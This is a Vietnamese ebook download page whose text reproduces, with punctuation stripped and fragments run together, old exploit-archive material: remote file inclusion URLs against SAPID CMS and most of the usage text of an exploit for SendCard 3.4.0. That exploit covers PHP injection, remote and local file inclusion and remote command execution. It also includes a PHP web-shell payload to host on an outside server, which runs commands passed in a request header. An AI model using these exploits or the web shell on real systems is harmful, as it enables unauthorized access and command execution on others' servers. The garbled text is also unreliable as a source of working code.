Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Tham khảo tài liệu 'hacker professional ebook part 426', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | Expl http www.site.com sapidcms_path usr extensions get_infochannel.inc.php root _path evil_scripts http www.site.com sapidcms_path usr extensions get_tree.inc.php GLOBALS root_path evil_scripts Pozdro dla wszystkich - milw0rm.com 2006-08-07 vns3curity HCE endCard 3.4.0 unauthorized administrative access Code usr bin php -q -d short_open_tag on echo SendCard 3.4.0 unauthorized administrative access remote commands n echo execution exploit n echo by rgod rgod@autistici.org n echo site http retrogod.altervista.org n echo dork Powered by sendcard - an advanced PHP e-card program n n if argc 4 echo Usage php . argv 0 . host path action location cmd OPTIONS n echo host target server ip hostname n echo path path to sendcard n echo action 1 - php injection n echo works against magic_quotes_gpc Off n echo 2 - arbitrary remote inclusion n echo works against allow_url_fopen On n echo 3 - arbitrary local inclusion n echo works regardless of php.ini settings n echo and if you succeed to include Apache logs n echo 4 - read phpinfo n echo location a remote http location with the code to include n echo needed by 2 with an ending slash n echo cmd a shell command needed by 1-3 n echo Options n echo -p port specify a port other than 80 n echo -P ip port specify a proxy n echo Example n echo php . argv 0 . localhost sendcard 1 ls -la n echo php . argv 0 . localhost sendcard 2 http somehost.com ls -la n echo php . argv 0 . localhost sendcard 3 ls -la n echo php . argv 0 . localhost sendcard 4 phpinfo.html n echo php . argv 0 . localhost sendcard 4 -p81 phpinfo.html n echo php . argv 0 . localhost sendcard 4 -P1.1.1.1 80 phpinfo.html n echo note for action 2 you need this code in http somehost.com sendcard_setup.php index.html n echo php set_time_limit 0 echo sun- tzu passthru _SERVER HTTP_CLIENT_IP echo sun-tzu die n die software site http www.sendcard.org vulnerable code in admin prepend.php near lines 32-34 if isset _SESSION session password _SESSION session password ADMIN_PASSWORD